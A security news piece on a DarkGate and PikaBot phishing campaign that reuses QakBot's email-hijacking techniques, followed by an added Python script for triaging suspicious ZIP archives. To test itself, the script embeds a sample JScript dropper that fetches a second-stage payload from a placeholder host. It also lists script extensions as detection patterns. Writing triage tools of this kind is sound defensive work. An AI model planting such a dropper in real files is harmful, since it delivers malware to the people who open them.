Attack techniques once used to disseminate the dismantled QakBot trojan, also known as QBot and Pinkslipbot, have been leveraged in a new widespread phishing campaign involving the DarkGate and PikaBot strains aimed at various industries, according to The Hacker News.
As in earlier QakBot campaigns, the threat actors hijack existing email threads and reply with phishing messages that carry a malicious URL. The URL redirects to a ZIP archive containing a JavaScript dropper, which in turn contacts a second URL to fetch and execute DarkGate or PikaBot, a report from Cofense showed.
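The chain described above (ZIP archive, script dropper inside it, second-stage URL inside the script) lends itself to a simple static triage step before anything is detonated. The following Python script is an added example written for this page, not code from Cofense or The Hacker News; the archive it inspects is constructed inline, and the member name, the dropper text and the `example.invalid` URL are made up for the demonstration.

```python
import io
import re
import zipfile

# Extensions that Windows Script Host or mshta will run directly from a
# double-clicked archive member (assumption: the usual dropper extensions).
SCRIPT_EXTS = (".js", ".jse", ".wsf", ".wsh", ".vbs", ".vbe", ".hta")

# Cleartext URL pattern; stops at quotes, whitespace and closing brackets.
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.IGNORECASE)


def build_sample_zip(with_dropper: bool = True) -> bytes:
    """Constructed sample archive: a harmless text file plus, optionally,
    a JScript dropper whose name uses a double extension (.pdf.js)."""
    dropper = (
        'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
        'x.open("GET", "http://example.invalid/stage2/payload.bin", false);\n'  # constructed URL
        "x.send();\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("readme.txt", "nothing to see here")
        if with_dropper:
            z.writestr("invoice_2023-11.pdf.js", dropper)  # hypothetical member name
    return buf.getvalue()


def triage_zip(data: bytes) -> dict:
    """Inspect a ZIP in memory and report script members, double-extension
    tricks and any cleartext URLs the scripts reference."""
    findings = {"scripts": [], "double_ext": [], "urls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename
            lower = name.lower()
            if not lower.endswith(SCRIPT_EXTS):
                continue
            findings["scripts"].append(name)
            # "invoice.pdf.js" -> ["invoice", "pdf", "js"]: more than one
            # extension is a classic lure to hide the real file type.
            basename = lower.rsplit("/", 1)[-1]
            if len(basename.split(".")) > 2:
                findings["double_ext"].append(name)
            # Pull second-stage URLs out of the script body. Obfuscated
            # droppers will not yield anything here; see the note below.
            text = z.read(info).decode("utf-8", errors="replace")
            findings["urls"].extend(URL_RE.findall(text))
    findings["verdict"] = (
        "suspicious" if findings["scripts"] and findings["urls"] else
        "review" if findings["scripts"] else "clean"
    )
    return findings


if __name__ == "__main__":
    for flag in (True, False):
        print(triage_zip(build_sample_zip(with_dropper=flag)))
```

The verdict deliberately does not depend on finding a URL: a script member in a mailed archive is already worth a look, because droppers commonly build the second-stage URL from string fragments or decode it at runtime, which a cleartext regex will miss. Treat an extracted URL as an indicator to block and hunt on, not as proof that nothing else is in the script.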
"A successful DarkGate or PikaBot infection could lead to the delivery of advanced crypto mining software, reconnaissance tools, ransomware, or any other malicious file the threat actors wish to install on a victim's machine," said Cofense.
Meanwhile, a separate Sekoia report described sophisticated anti-detection mechanisms built into DarkGate, which also supports PowerShell execution, keystroke logging, and remote control of the infected host.
"The connection is bidirectional, meaning the attackers can send commands and receive responses in real-time, enabling them to navigate the victim's system, exfiltrate data, or perform other malicious actions," Sekoia added.